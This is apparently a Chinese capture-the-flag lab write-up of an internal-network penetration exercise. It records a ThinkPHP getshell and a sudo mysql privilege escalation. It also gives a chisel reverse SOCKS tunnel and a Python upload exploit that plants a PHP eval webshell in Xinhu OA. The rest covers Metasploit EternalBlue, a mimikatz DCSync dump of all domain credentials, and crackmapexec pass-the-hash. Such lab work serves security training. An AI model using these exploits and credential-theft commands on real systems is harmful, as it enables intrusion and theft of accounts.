靶标介绍：

Initial是一套难度为简单的靶场环境，完成该挑战可以帮助玩家初步认识内网渗透的简单流程。该靶场只有一个flag，各部分位于不同的机器上。

外网

打开给的网址, 有一个登录框
用fscan扫描一下可以发现存在两个端口, 80和22
80端口的网站是thinkphp的框架, 用工具扫一下getshell
上蚁剑连一下
可以发现当前的权限是 www-data
肯定是需要提权的
sudo -l
可以发现存在一个root权限并且没有密码的mysql

利用mysql进行提权 sudo mysql -e '\! whoami'

拿到第一个flag

flag01:  flag{60b53231-

给了我们一个提示

the next flag may be in a server in the internal network.
可以看到它的内网网段
172.22.1.0/24

将fscan上传上去, 进行扫描

内网基本信息

172.22.1.2 DC域控172.22.1.21 存在MS17-010永恒之蓝172.22.1.18 信呼OA系统

内网

使用chisel建立socks5代理, 以使本地能够访问到内网资源

chisel服务端 (vps)

./chisel server -p 6666 --reverse

首先，服务器端监听6666端口，然后使用reverse参数，reverse表示的是服务端使用反向模式，也就是流量转到哪个端口由客户端直接指定的

客户端(受控主机)

./chisel client vps:6666 R:0.0.0.0:9383:socks

将受控主机作为client，然后连接vps:6666，把所有流量通过vps:6666进行转发，然后把vps:9383端口作为socks5代理

运行完之后就可以在本地电脑进行socks5代理, 连接 vps:9383 实现对内网资源的访问

使用proxifier进行代理

然后就可以直接用浏览器访问内网地址了

信呼oa

这个版本信呼OA存在后台的漏洞

https://blog.51cto.com/u_15847702/5827475

弱口令 admin / admin123可以登录进去

poc脚本

再在同一目录下建一个1.php

<?=eval($_POST[1]);?>

import requestssession = requests.session()url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'data1 = {'rempass': '0','jmpass': 'false','device': '1625884034525','ltype': '0','adminuser': 'YWRtaW4=','adminpass': 'YWRtaW4xMjM=','yanzm': ''
}r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
print(id)
print(filepath)
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir');")
print(r.text)

运行后会有一个路由打印处理 /upload/2025-03/29_15374987.php
访问这个路由, 用蚁剑连接

可以拿到flag2

flag02: 2ce3-4813-87d4-

永恒之蓝

然后就是内网的另外一台主机了, 存在永恒之蓝的漏洞, 直接msf打

不过要先配一下代理

sudo vim /etc/proxychains4.conf

然后就进入msf打永恒之蓝

proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid
set RHOSTS 172.22.1.21
exploit

可以看到拿到了一个shell

hash传递

抓取用户的hash

load kiwi  #加载 Kiwi 模块
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit# kiwi_cmd  执行mimikatz的命令，后面接mimikatz.exe的命令
# lsadump::dcsync → 执行 DCSync 攻击，从域控制器拉取凭据信息。
# /domain:xiaorang.lab → 目标 Active Directory 域名是 xiaorang.lab。
# /all → 获取 域内所有用户 的凭据数据（包括 NTLM Hash、Kerberos Key）。
# /csv → 以 CSV 格式 输出数据，方便导出分析。
# exit 退出当前会话

抓取到了Administrator用户的hash
使用crackmapexec打hash传递

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H 10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"# crackmapexec smb：使用 SMB 协议 进行攻击（通常用于 Windows 文件共享和远程命令执行）
# -H <hash>：使用 NTLM 哈希认证（Pass-the-Hash 攻击）
# -d 指定AD域名
# -x 远程执行Windows cmd命令

flag03: e8f88d0d43d6}

浪费了很多时间在代理上面, 不知道为什么前面一直连不上

参考文章:

https://fushuling.com/index.php/2023/08/27/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83%C2%B7initial/